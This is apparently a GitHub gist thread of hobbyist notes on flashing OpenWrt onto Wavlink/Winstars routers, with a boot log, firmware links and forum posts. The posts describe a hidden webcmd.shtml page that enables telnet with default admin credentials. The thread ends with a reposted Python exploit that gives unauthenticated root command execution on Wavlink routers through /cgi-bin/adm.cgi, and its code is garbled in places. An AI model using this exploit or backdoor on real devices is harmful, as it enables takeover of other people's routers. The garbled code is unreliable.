[ 4.015589] hub 2-0:1.0: 1 port detected
[ 4.029235] kmodloader: done loading kernel modules from /etc/modules-boot.d/*
[ 4.057281] init: - preinit -
[ 4.797915] mtk_soc_eth 1e100000.ethernet eth0: configuring for fixed/rgmii link mode
[ 4.814022] mtk_soc_eth 1e100000.ethernet eth0: Link is Up - 1Gbps/Full - flow control rx/tx
[ 4.830903] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 4.978504] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.045835] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.117851] random: jshn: uninitialized urandom read (4 bytes read)
[ 5.334563] mt7530 mdio-bus:1f lan1: configuring for phy/gmii link mode
[ 5.348189] 8021q: adding VLAN 0 to HW filter on device lan1
[ 9.537340] mount_root: jffs2 not ready yet, using temporary tmpfs overlay
[ 9.567242] urandom-seed: Seed file not found (/etc/urandom.seed)
[ 9.656614] procd: - early -
[ 9.662505] procd: - watchdog -
[ 10.285095] procd: - watchdog -
[ 10.291682] procd: - ubus -
[ 10.502265] procd: - init -
[ 11.059147] kmodloader: loading kernel modules from /etc/modules.d/*
[ 11.090205] Loading modules backported from Linux version v5.8-0-gbcf876870b95
[ 11.104688] Backport generated by backports.git v5.8-1-0-g79400d9e
[ 11.143165] xt_time: kernel timezone is -0000
[ 11.220696] mt7621-pci 1e140000.pcie: bus=1 slot=0 irq=20
[ 11.231608] pci 0000:00:00.0: enabling device (0004 -> 0007)
[ 11.242917] mt7615e 0000:01:00.0: enabling device (0000 -> 0002)
[ 11.243758] urngd: v1.0.2 started.
[ 11.276530] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 11.289884] mt7621-pci 1e140000.pcie: bus=2 slot=1 irq=21
[ 11.300733] pci 0000:00:01.0: enabling device (0004 -> 0007)
[ 11.312082] mt7615e 0000:02:00.0: enabling device (0000 -> 0002)
[ 11.352282] ieee80211 phy1: Selected rate control algorithm 'minstrel_ht'
[ 11.422459] PPP generic driver version 2.4.2
[ 11.434650] NET: Registered protocol family 24
[ 11.464358] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 11.478846] mt7615e 0000:01:00.0: HW/SW Version: 0x8a108a10, Build Time: 20180518100604a
[ 11.478846]
[ 11.498087] mt7615e 0000:02:00.0: HW/SW Version: 0x8a108a10, Build Time: 20180518100604a
[ 11.498087]
[ 11.805806] random: crng init done
[ 11.812625] random: 7 urandom warning(s) missed due to ratelimiting
[ 11.910535] mt7615e 0000:02:00.0: N9 Firmware Version: _reserved_, Build Time: 20200814163649
[ 11.910584] mt7615e 0000:01:00.0: N9 Firmware Version: _reserved_, Build Time: 20200814163649
[ 11.998511] mt7615e 0000:02:00.0: CR4 Firmware Version: _reserved_, Build Time: 20190121161307
[ 11.998519] mt7615e 0000:01:00.0: CR4 Firmware Version: _reserved_, Build Time: 20190121161307
[ 19.612561] ieee80211 phy2: Selected rate control algorithm 'minstrel_ht'
[ 19.612590] ------------[ cut here ]------------
[ 19.622052] WARNING: CPU: 0 PID: 19 at backports-5.8-1/net/wireless/core.c:872 wiphy_register+0xd80/0xd88 [cfg80211]
[ 19.643068] Modules linked in: pppoe ppp_async iptable_nat xt_state xt_nat xt_conntrack xt_REDIRECT xt_MASQUERADE xt_FLOWOFFLOAD xt_CT pppox ppp_generic nf_nat nf_flow_table_hw nf_flow_table nf_conntrack_rtcache nf_conntrack mt7615e mt7615_common mt7603e mt76 mac80211 ipt_REJECT cfg80211 xt_time xt_tcpudp xt_multiport xt_mark xt_mac xt_limit xt_comment xt_TCPMSS xt_LOG slhc nf_reject_ipv4 nf_log_ipv4 nf_defrag_ipv6 nf_defrag_ipv4 iptable_mangle iptable_filter ip_tables crc_ccitt compat nf_log_ipv6 nf_log_common ip6table_mangle ip6table_filter ip6_tables ip6t_REJECT x_tables nf_reject_ipv6 leds_gpio xhci_plat_hcd xhci_pci xhci_mtk xhci_hcd gpio_button_hotplug usbcore nls_base usb_common
[ 19.764451] CPU: 0 PID: 19 Comm: kworker/u4:1 Not tainted 5.4.61 #0
[ 19.776945] Workqueue: phy0 0x873f42e0
[ 19.784398] Stack : 806576d8 87cbdc7c 806d0000 80720000 87cb4080 80668ee4 8738123c 00000009
[ 19.801029] 86c75908 00000001 00000004 8007d624 00000000 00000001 87cbdc38 d999a5ca
[ 19.817657] 00000000 00000000 00000000 00000000 00000030 00000101 6870203a 30203079
[ 19.834282] 00000000 00000000 00000000 000bdaf1 00000000 80740000 00000000 8738123c
[ 19.850909] 00000009 86c75908 00000001 00000004 00000001 8034f8e0 01808117 01808157
[ 19.867535] ...
[ 19.872394] Call Trace:
[ 19.877279] [<8000b72c>] show_stack+0x30/0x100
[ 19.886149] [<805a96e8>] dump_stack+0xa4/0xdc
[ 19.894830] [<8002bea0>] __warn+0xc0/0x10c
[ 19.902978] [<8002bf48>] warn_slowpath_fmt+0x5c/0xac
[ 19.912915] [<8738123c>] wiphy_register+0xd80/0xd88 [cfg80211]
[ 19.924700] [<86c014ac>] ieee80211_register_hw+0x9bc/0xd8c [mac80211]
[ 19.937584] [<873121dc>] mt76_register_phy+0x18/0x38 [mt76]
[ 19.948700] [<873e31e4>] mt7615_register_ext_phy+0x274/0x2ac [mt7615_common]
[ 19.962743] [<800458f0>] process_one_work+0x244/0x498
[ 19.972790] [<80045cac>] worker_thread+0x168/0x5ec
[ 19.982319] [<8004b4dc>] kthread+0x140/0x148
[ 19.990812] [<800068d8>] ret_from_kernel_thread+0x14/0x1c
[ 20.002178] ---[ end trace a5f82ab23c5525ea ]---
[ 22.879487] jffs2_scan_eraseblock(): End of filesystem marker found at 0x0
[ 22.905118] jffs2_build_filesystem(): unlocking the mtd device...
[ 22.905208] done.
[ 22.921475] jffs2_build_filesystem(): erasing all blocks after the end marker...
[ 24.669402] mtk_soc_eth 1e100000.ethernet eth0: Link is Down
[ 24.720136] mtk_soc_eth 1e100000.ethernet eth0: configuring for fixed/rgmii link mode
[ 24.737804] mtk_soc_eth 1e100000.ethernet eth0: Link is Up - 1Gbps/Full - flow control rx/tx
[ 24.766820] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
[ 24.780800] mt7530 mdio-bus:1f lan1: configuring for phy/gmii link mode
[ 24.820428] 8021q: adding VLAN 0 to HW filter on device lan1
[ 24.854622] br-lan: port 1(lan1) entered blocking state
[ 24.865132] br-lan: port 1(lan1) entered disabled state
[ 24.878823] device lan1 entered promiscuous mode
[ 24.888169] device eth0 entered promiscuous mode
[ 24.935843] mt7530 mdio-bus:1f lan2: configuring for phy/gmii link mode
[ 24.960458] 8021q: adding VLAN 0 to HW filter on device lan2
[ 24.992889] br-lan: port 2(lan2) entered blocking state
[ 25.003449] br-lan: port 2(lan2) entered disabled state
[ 25.043911] device lan2 entered promiscuous mode
[ 25.080783] mt7530 mdio-bus:1f lan3: configuring for phy/gmii link mode
[ 25.124745] 8021q: adding VLAN 0 to HW filter on device lan3
[ 25.157653] br-lan: port 3(lan3) entered blocking state
[ 25.168132] br-lan: port 3(lan3) entered disabled state
[ 25.205570] device lan3 entered promiscuous mode
[ 25.243280] mt7530 mdio-bus:1f lan4: configuring for phy/gmii link mode
[ 25.285919] 8021q: adding VLAN 0 to HW filter on device lan4
[ 25.320230] br-lan: port 4(lan4) entered blocking state
[ 25.330783] br-lan: port 4(lan4) entered disabled state
[ 25.367052] device lan4 entered promiscuous mode
[ 25.420809] mt7530 mdio-bus:1f wan: configuring for phy/gmii link mode
[ 25.440614] 8021q: adding VLAN 0 to HW filter on device wan
[ 29.389475] mt7530 mdio-bus:1f lan4: Link is Up - 1Gbps/Full - flow control rx/tx
[ 29.404508] br-lan: port 4(lan4) entered blocking state
[ 29.414970] br-lan: port 4(lan4) entered forwarding state
[ 29.429366] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
[ 29.549460] mt7530 mdio-bus:1f wan: Link is Up - 1Gbps/Full - flow control off
[ 29.563930] IPv6: ADDRCONF(NETDEV_CHANGE): wan: link becomes ready
[ 43.193493] done.
[ 43.197377] jffs2: notice: (1437) jffs2_build_xattr_subsystem: complete building xattr subsystem, 0 of xdatum (0 unchecked, 0 orphan) and 0 of xref (0 dead, 0 orphan) found.
[ 43.350534] overlayfs: upper fs does not support tmpfile.
[ 1247.703714] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.722922] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.800040] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.814896] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.892238] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.907265] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 1247.984304] kmodloader: loading kernel modules from /etc/modules.d/*
[ 1247.999302] kmodloader: done loading kernel modules from /etc/modules.d/*
# padavan, etc, and other
# FIRMWARE
https://www.mediafire.com/file/80a80u2155vt0ta/WN533A8-WAVLINK-20181109/file
# Thank you source here:
https://forum.openwrt.org/t/mt7621-bricked/24802
# Thank you guy who backed up the entire deviwiki keeping it alive with updates here:
http://en.techinfodepot.shoutwiki.com/wiki/Winstars_WS-WN536A8
# Connor; Thank you reverse engineer here:
https://mcmillan.website/openwrt-for-wl-wn575a3/
https://mcmillan.website/rewriting-mt7628an-bootloader/
https://mcmillan.website/openwrt-ws-wn529b3/
# The Resellers with amazing stock firmware
https://play.google.com/store/apps/developer?id=WiLink.APP&hl=en_US
https://ematic.zendesk.com/hc/en-us/articles/360021348313-ERAC3000
https://forum.dd-wrt.com/phpBB2/viewtopic.php?p=1183408&sid=5005cba771e7a8a312f7352275e0ad18
LoopBoot
Nov '20
Hi Guys,
I have installed OpenWrt SNAPSHOT on my WAVLINK AC3000 (model: WL-WN533A8) following these instructions:
https://github.com/bubbadestroy/Jetstream_AC3000 48
So far everything is going well, but unfortunately I have problems with the radio module. The device usually has 3 different frequency bands (SSIDs) and supports 1x 2.4GHz and 2x 5GHz at the same time:
SSID1 (2.4GHz): WAVLINK-N
SSID2 (5GHz): WAVLINK-AC
SSID3 (5GHz): WAVLINK-AC-1733M
LuCI only shows 2 radio modules under /network/wireless (radio0, radio1). radio0 should support the 2.4GHz band and radio1 the 5GHz band. So far so good.
Now I would like to set up an SSID for radio0 and radio1 each. I named them like this:
radio0: OpenWrt_TEST_N
radio1: OpenWrt_TEST_AC
If I want to set up another, second SSID for radio1 (OpenWrt_TEST_AC1733), the 5GHz radio module no longer starts and hangs up. After restarting the router, I no longer have access to the shell and LuCI, and a connection is no longer possible to configure the router. I have to reset it.
I adjusted the radio channels in the same way as with the OEM firmware. With radio0 it worked without any problems, but not with radio1. If it worked, both SSIDs (OpenWrt_TEST_AC / OpenWrt_TEST_AC1733) were broadcasting on the same channel. The channels are and should be different from the factory.
Did I do something wrong? Why do I only see 2 radio modules? Is the driver for this router possibly incompatible because I worked according to the instructions for the WS-WN536A8? But according to these instructions, the same hardware should be installed.
OpenWrt SNAPSHOT r14900-acb336235c

vwnut8392

https://forum.openwrt.org/t/trick-discovered-to-enable-telnet-on-wavlink-wl-wn570ha1-factory-firmware/49342

Trick discovered to enable telnet on Wavlink WL-WN570HA1 factory firmware Hardware Questions and Recommendations vwnut8392 Nov '19

i figured out late last night how to enable telnet on the WL-WN570HA1 thats running 190220 firmware. There is a hidden web page at http://192.168.10.1/webcmd.shtml 32. once you are on this page type telnetd into the command box and press the apply button. nothing will show up in the lower box as a reply but if you port scan the device you will find port 2323 is now open for telnet. the default login=admin password=admin.

its still limited on what can be done because of limited commands like no wget but its another door into the device that could lead to something. This may or may not work on other firmware revisions but it definitely works on 190220.

The link below is to the Wavlink WL-WN570HA1 190220 firmware. you can upgrade to this through the default firmware upgrade page. https://drive.google.com/open?id=1PlySf2y8X1vHCdl4wZT8hUtIO4QxcmHw 59

2

3

https://frickel.cloud/firmware/openwrt/-/tree/92780d80ab6f5f03fac2407c06eb267dd83914a1/target/linux/ramips

4

DavideFioravanti:winstars_ws-wn583a6

5

6

ramips: add support for Winstars WS-WN583A6

7

8

The Winstars WS-WN583A6 is a wireless repeater with 2 gigabit ethernet

9

ports. Even if mine is branded as "Gemeita AC2100", the sticker on the

10

back says WS-WN583A6. So I will refer to it as Winstars WS-WN583A6.

11

Probably the real product name is the Wavlink WL-WN583A6 because of

12

the many references to Wavlink in the OEM firmware and bootlog.

13

14

Hardware

15


16

SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)

17

RAM: 128MB

18

FLASH: 8MB NOR (GigaDevice GD25Q64B)

19

ETH: 2x 10/100/1000 Mbps Ethernet (MT7530)

20

WIFI:

21

  • 2.4GHz: 1x MT7603E (2x2:2)

22

  • 5GHz: 1x MT7615E (4x4:4)

23

  • 6 internal antennas

24

BTN:

25

  • 1x Reset button

26

  • 1x WPS button

27

  • 1x ON/OFF switch (working but unmodifiable)

28

WL-WN572HG3 Soft Hack?

4 months later 4 months later frustro 1 PolynomialDivision 26d

I got in, the uart was not any of the groups of 4 pin header vias, it was a lone 2 holes about 3-4 inches from the end. I dont remember which one. Heres me putting around in putty. the pastebin 1 I eventually figured this out and was able to load images across with tftp and attempt to boot. IIRC I kept running into storage issues. couldn't find something.to mount, another just went to kernel panic. that was with the official nightlies for that soc and glue hardware. I then made builder machine and cooked up this

Booting image at 82000000 ... Image Name: MIPS OpenWrt Linux-4.14.180 Image Type: MIPS Linux Kernel Image (lzma compressed) Data Size: 3813618 Bytes = 3.6 MB Load Address: 80000000 Entry Point: 80000000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK No initrd

Transferring control to Linux (at address 80000000) ...

Giving linux memsize in MB, 64

Starting kernel ...

Linux version 4.14.180 (builder@buildhost) (gcc version 7.5.0 (OpenWrt GCC 7.5.0 r11063-85e04e9f46)) #0 Sat May 16 18:32:20 2020 Board has DDR2

but downtime was annoying people so that is as far as i got.

ill get back to it soon. frustro 24d

I downloaded the file from the link above, ran it through binwalk. Other than some auth server in france it seems ok. Need to go through it some more.

telnet port 2323 opened up for me and I was able login as admin2860 with the password set on the initial setup wizard.

I have since created a new user. I'll be compiling ssh for it later today.

the initial login busybox is missing many commands so be sure to execute /bin/busybox for a larger command set.

/bin/busybox

BusyBox v1.12.1 (2020-02-29 14:28:25 CST) multi-call binary Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko and others. Licensed under GPLv2. See source distribution for full notice.

Usage: busybox [function] [arguments]... or: function [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions: [, [[, addgroup, adduser, arp, arping, ash, awk, brctl, cat, chmod, chpasswd, cp, crond, crontab, cut, date, dd, delgroup, deluser, df, diff, dmesg, dumpleases, echo, expr, fdisk, free, getty, grep, halt, head, hexdump, hostname, id, ifconfig, init, init, insmod, kill, killall, klogd, ln, logger, login, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, netstat, nslookup, passwd, ping, ping6, poweroff, printf, ps, pwd, reboot, rm, rmmod, route, sed, seq, sh, sleep, sulogin, sync, sysctl, syslogd, telnetd, test, tftp, time, top, touch, tr, udhcpc, udhcpd, umount, uptime, vconfig, vi, vlock, wc, wget

ls -l

drwxr-xr-x 3 0 0 0 dev drwxr-xr-x 5 0 0 0 usr drwxr-xr-x 3 0 0 0 etc drwxr-xr-x 4 0 0 0 lib drwxr-xr-x 2 0 0 0 mnt drwxr-xr-x 3 0 0 0 home drwxr-xr-x 2 0 0 0 sbin drwxr-xr-x 6 0 0 0 var lrwxrwxrwx 1 0 0 11 init -> bin/busybox drwxr-xr-x 11 0 0 0 etc_ro drwxr-xr-x 11 0 0 0 sys drwxr-xr-x 2 0 0 0 bin dr-xr-xr-x 49 0 0 0 proc drwxr-xr-x 4 0 0 0 tmp drwxr-xr-x 2 0 0 0 media drwxr-xr-x 3 0 0 0 vendor

pwd

/

cd /etc

cd ..

cd etc_ro/lighttpd/www/

ls -l

drwxr-xr-x 2 0 0 0 cgi-bin -rwxr-xr-x 1 0 0 17986 sch_reboot.shtml -rwxr-xr-x 1 0 0 10047 live_test.shtml -rwxr--r-- 1 0 0 43 live_dmesg.shtml -rwxr--r-- 1 0 0 3322 live_mfg.shtml -rwxr-xr-x 1 0 0 48 mesh_get_signal.shtml -rwxr-xr-x 1 0 0 38951 lang2_fr.js -rwxr-xr-x 1 0 0 27082 live_get_mesh_app.shtml -rwxr-xr-x 1 0 0 47 live_setLedOff.shtml drwxr-xr-x 2 0 0 0 wifi_wavlink -rwxr-xr-x 1 0 0 1518 live_check_ddns.shtml -rwxr-xr-x 1 0 0 16466 wifi_rep.shtml -rwxr-xr-x 1 0 0 939 main1.shtml -rwxr-xr-x 1 0 0 12625 update_mesh_app.shtml -rwxr-xr-x 1 0 0 3976 webcmd.shtml -rwxr-xr-x 1 0 0 30438 wizard_rep.shtml -rwxr-xr-x 1 0 0 47 live_cli_signal.shtml -rwxr-xr-x 1 0 0 15622 login.shtml -rwxr-xr-x 1 0 0 27925 wizard_wisp_mesh.shtml -rwxr-xr-x 1 0 0 1329 live_check_fw.shtml -rwxr-xr-x 1 0 0 23266 reset_reboot.shtml -rwxr-xr-x 1 0 0 29315 main.shtml -rwxr-xr-x 1 0 0 188 live_getsettings.shtml -rwxr-xr-x 1 0 0 27605 live_get_mesh.shtml -rwxr-xr-x 1 0 0 25819 setting.shtml -rwxr--r-- 1 0 0 34476 lang2_en.js -rwxr-xr-x 1 0 0 18053 wifi.shtml -rwxr-xr-x 1 0 0 29937 wizard_wisp.shtml -rwxr-xr-x 1 0 0 34757 wifi_base.shtml -rwxr-xr-x 1 0 0 9218 linux.css -rwxr-xr-x 1 0 0 48 live_ddns.shtml -rwxr-xr-x 1 0 0 8327 live_check.shtml -rwxr-xr-x 1 0 0 13872 ddns.shtml -rwxr-xr-x 1 0 0 46 live_mac.shtml -rwxr-xr-x 1 0 0 302 live_setting.shtml -rwxr-xr-x 1 0 0 15038 check_update.shtml -rwxr-xr-x 1 0 0 12613 update_mesh.shtml -rwxr-xr-x 1 0 0 32242 lang2_cn.js -rwxr-xr-x 1 0 0 14086 update_uboot.shtml -rwxr-xr-x 1 0 0 18095 nas_disk.shtml -rwxr-xr-x 1 0 0 42 live_language.shtml -rwxr-xr-x 1 0 0 1224 live_internet.shtml -rwxr-xr-x 1 0 0 10234 reset_app.shtml -rwxr-xr-x 1 0 0 430 mesh_satellite_status.shtml -rwxr-xr-x 1 0 0 32648 linux.js -rwxr-xr-x 1 0 0 3470 lang_net_conf.js -rwxr-xr-x 1 0 0 38928 lang2_es.js -rwxr-xr-x 1 0 0 2842 live_status.shtml -rwxr--r-- 1 0 0 28817 net_tool.shtml -rwxr-xr-x 1 0 0 6 apptimeout.shtml -rwxr-xr-x 1 0 0 485 mesh_get_extender.shtml -rwxr-xr-x 1 0 0 10756 ledonoff.shtml -rwxr-xr-x 1 0 0 13893 nightlight_onoff.shtml -rwxr-xr-x 1 0 0 309 803F5D.txt -rwxr-xr-x 1 0 0 32752 lang2_tw.js -rwxr-xr-x 1 0 0 1463 live_speed.shtml -rwxr-xr-x 1 0 0 3031 live_signal.shtml -rwxr-xr-x 1 0 0 19951 lan.shtml -rwxr-xr-x 1 0 0 46 live_internetStatus.shtml -rwxr-xr-x 1 0 0 20386 wifi_advance2.shtml -rwxr-xr-x 1 0 0 44989 lang2_jp.js -rwxr-xr-x 1 0 0 2540 live_online.shtml drwxr-xr-x 2 0 0 0 Templates -rwxr-xr-x 1 0 0 25381 devicestat.shtml -rwxr-xr-x 1 0 0 32253 wizard_ap.shtml -rwxr-xr-x 1 0 0 25527 wifi_advance5.shtml -rwxr-xr-x 1 0 0 27986 sysinit.shtml -rwxr-xr-x 1 0 0 9897 wifi_roaming.shtml -rwxr-xr-x 1 0 0 17343 wifi_mesh.shtml -rwxr-xr-x 1 0 0 35522 lang2_nl.js -rwxr-xr-x 1 0 0 85 lan_get_strength.shtml -rwxr-xr-x 1 0 0 30036 wizard_router.shtml -rwxr-xr-x 1 0 0 9240 fileerror.shtml -rwxr-xr-x 1 0 0 17378 wifi_touchlink.shtml -rwxr-xr-x 1 0 0 19178 set_time.shtml -rwxr-xr-x 1 0 0 16705 set_safety.shtml -rwxr-xr-x 1 0 0 3449 lang_jet_conf.js -rwxr-xr-x 1 0 0 25168 wizard_client.shtml -rwxr-xr-x 1 0 0 21683 wizard.shtml -rwxr-xr-x 1 0 0 54 live_disk.shtml -rwxr-xr-x 1 0 0 93436 jquery-1.8.2.min.js -rwxr-xr-x 1 0 0 45 mesh_sync.shtml -rwxr-xr-x 1 0 0 27887 wizard_router_mesh.shtml -rwxr-xr-x 1 0 0 22786 wifi_base_mesh.shtml drwxr-xr-x 2 0 0 0 images -rwxr-xr-x 1 0 0 12239 sitesurvey.shtml -rwxr-xr-x 1 0 0 10404 man_security.shtml -rwxr-xr-x 1 0 0 19516 update.shtml -rwxr-xr-x 1 0 0 39227 lang2_it.js -rwxr-xr-x 1 0 0 13145 reset.shtml -rwxr-xr-x 1 0 0 10432 wifi.js -rwxr-xr-x 1 0 0 44 mesh_get_mode.shtml -rwxr--r-- 1 0 0 15212 cli_control.shtml -rwxr-xr-x 1 0 0 12381 wifi_region.shtml -rwxr-xr-x 1 0 0 1150 favicon.ico -rwxr-xr-x 1 0 0 38657 lang2_de.js -rwxr-xr-x 1 0 0 19631 update_mesh_fw.shtml -rwxr-xr-x 1 0 0 2963 live_repsignal.shtml -rwxr-xr-x 1 0 0 18230 extender_set_ssid.shtml -rwxr-xr-x 1 0 0 8825 md5.js -rwxr-xr-x 1 0 0 11845 wifi_mode.shtml -rwxr-xr-x 1 0 0 13101 wifi_guest.shtml -rwxr-xr-x 1 0 0 30991 wan.shtml -rwxr-xr-x 1 0 0 16120 ledonoff_mesh.shtml -rwxr-xr-x 1 0 0 46 live_setLedOn.shtml -rwxr-xr-x 1 0 0 3466 lang_conf.js -rwxr-xr-x 1 0 0 11961 reset_update.shtml lrwxrwxrwx 1 0 0 17 messages.txt -> /var/log/messages lrwxrwxrwx 1 0 0 12 speed.tmp -> /bin/busybox

frustro 24d

Well, I guess all of that was kinda pointless/

Random firmware from @alecuba16

Here is his FW image http://IP/webcmd.shtml /bin/busybox image image905×657 26.2 KB

And here is OEM firmware http://IP/webcmd.shtml /bin/busybox OEM firmware OEM firmware865×612 25 KB

so I guess there was a built in root access anyways.

I'll still document the board for USB host (x2?) and the UART for serial.

~frustro frustro frustro 24d

============ PuTTY log 2020.08.22 18:21:56 ============ WAVLINK login: admin2860 Password:

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) built-in shell (ash) Enter 'help' for a list of built-in commands.

/bin/busybox

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) multi-call binary Copyright (C) 1998-2008 Erik Andersen, Rob Landley, Denys Vlasenko and others. Licensed under GPLv2. See source distribution for full notice.

Usage: busybox [function] [arguments]... or: function [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions: [, [[, addgroup, adduser, arp, ash, awk, brctl, cat, chmod, chpasswd, cp, crond, crontab, cut, date, delgroup, deluser, df, dmesg, dumpleases, echo, expr, fdisk, free, getty, grep, halt, head, hexdump, hostname, id, ifconfig, init, init, insmod, kill, killall, klogd, ln, logger, login, ls, lsmod, md5sum, mdev, mkdir, mknod, mount, netstat, nslookup, passwd, ping, ping6, poweroff, printf, ps, pwd, reboot, rm, rmmod, route, sed, seq, sh, sleep, sulogin, sync, syslogd, telnetd, test, tftp, time, top, touch, tr, udhcpc, udhcpd, umount, uptime, vconfig, vi, vlock, wc, wget

adduser frustro

Changing password for frustro New password: Retype password: Password for frustro changed by admin2860

login

WAVLINK login: frustro Password:

BusyBox v1.12.1 (2019-02-28 15:06:05 CST) built-in shell (ash) Enter 'help' for a list of built-in commands.

exit

PolynomialDivision frustro 22d

Nice! So we don't have any trouble flashing random firmware?

I will buy me some device, too. frustro 22d

I wouldnt recommend this device at all @PolynomialDivision. The ethernet ports are only 10/100 so if you have internet faster than 100mbps you have a bottleneck there. The only way to get around that is to have the unit in repeater mode and use 5g wifi to connect to your local network. Using the ethernet in AP or Router mode will just slow everything down to the speed of that port.

It's possible that the USB ports are there but just not populated and you might be able to add a USB gigabit ethernet adapter and then cook that into a openwrt FW image.

Just a thought.

~frustro PolynomialDivision frustro 22d

10/100

o.O

Thanks! Okay. PolynomialDivision 21d

@frustro

Any idea if there is some Mediatek Outdoor Hardware, that has 1 GB port?

I would like to try Mediatek Device, but maybe I have to stick to EAP225 Outdoor.

@bubbadestroy
Copy link
Author

bubbadestroy commented Sep 15, 2020

ERAC3000UMNewEMB
#erac3000umnewemb
53441439 profile image Fork
Jul 1 ・2 min read
WLN300-Exploit-and-patch

Wavlink router remote code execution exploit code and patch code. (wavlink n300). This exploit requiers no authentication other than being on the same sub network. The exploit will give RCE with root access.
How to use

python3 Exploit.py 192.168.0.1
Disclouser date

04/06/2018
Requirements

pip install requests
python version 3
How does the exploit works?

The router has a hidden developer console that can be accesssed over port 80, the program will make requests to emulate a shell and allow remote code execution on the target
How does the patch work?

The patch works by exploiting the system and removing the vulnerable file to prevent further exploitation
Warrenty

Use this code at your own risk, this code comes with no warrenty. Never run this code against a wavlink router that you do not own, even the patch.
Contribution

Feel free to contribute as my error testing is not comprehensive
also I have no tested the patch (as this would fix my router and I want to be able to play with other bin files etc on the router)

exploit.py

import requests
import sys
import re

def main():
loop = 0
if len(sys.argv) != 2:
print("[-]Please supply an ip address")
print("[ ]python exploit.py ")
exit(0)
else:
ip = sys.argv[1]

print("[+]Correct number of argv")
print("[+]WAV-LINK (WL-WN529N2) exploit")
print("[ ]This is a demo and should only be used on your own equipment")
print("[ ]Runing this program can brick the router forever, use with caution")

ans = input("[ ]Red team or Blue team?\n[ ]This tool can be used to exploit or patch the router\n[ ]Press 'Y' to exploit or 'n' to patch the device\n")
while loop == 0:
if (ans == "y" or ans == "Yes" or ans == "Y" or ans == "yes"):
while(1):
try:
command = input("root@" + ip + ":")
r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
r2 = requests.get("http://" + ip + "/webcmd.shtml")
find(r2.text)
except Exception as e:
print(e)
sys.exit(1)

elif (ans == "n" or ans == "N" or ans == "no" or ans == "No"):
        command = "rm webcmd.shtml"
        try:
            r = requests.post("http://" + ip + "/cgi-bin/adm.cgi/", data = {'page':'sysCMD', 'command': command, 'SystemCommandSubmit':'Apply'})
            r2 = requests.get("http://" + ip + "/webcmd.shtml")
            print("[ ]Trying to remove developer console")
            print("[+]System patched")
        except Exception as e:
            print(e)
            sys.exit(1)

def find(html):
parsed = html.split('')[1].split('')[0]
print(parsed)

main()

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment